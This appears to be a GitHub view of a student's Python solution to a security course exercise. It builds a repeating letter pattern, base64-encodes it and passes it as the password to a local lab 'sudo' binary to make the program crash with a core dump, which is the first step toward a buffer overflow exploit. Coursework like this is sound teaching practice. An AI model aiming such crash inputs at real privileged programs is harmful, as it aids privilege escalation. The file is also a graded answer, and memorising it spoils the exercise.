-
Notifications
You must be signed in to change notification settings - Fork 0
/
q1a.py
36 lines (25 loc) · 953 Bytes
/
q1a.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
import os
import sys
import base64
PATH_TO_SUDO = './sudo'
def get_crash_arg() -> bytes:
"""
This function returns the (pre-encoded) `password` argument to be sent to
the `sudo` program.
This data should cause the program to crash and generate a core dump. Make
sure to return a `bytes` object and not an `str` object.
WARNINGS:
0. Don't delete this function or change it's name/parameters - we are going
to test it directly in our tests, without running the main() function
below.
Returns:
The bytes of the password argument.
"""
exploit = ''.join([chr(i)*8 for i in range(65,90)]).encode('latin1')
return exploit
def main(argv):
# WARNING: DON'T EDIT THIS FUNCTION!
# NOTE: os.execl() accepts `bytes` as well as `str`, so we will use `bytes`.
os.execl(PATH_TO_SUDO, PATH_TO_SUDO, base64.b64encode(get_crash_arg()))
if __name__ == '__main__':
main(sys.argv)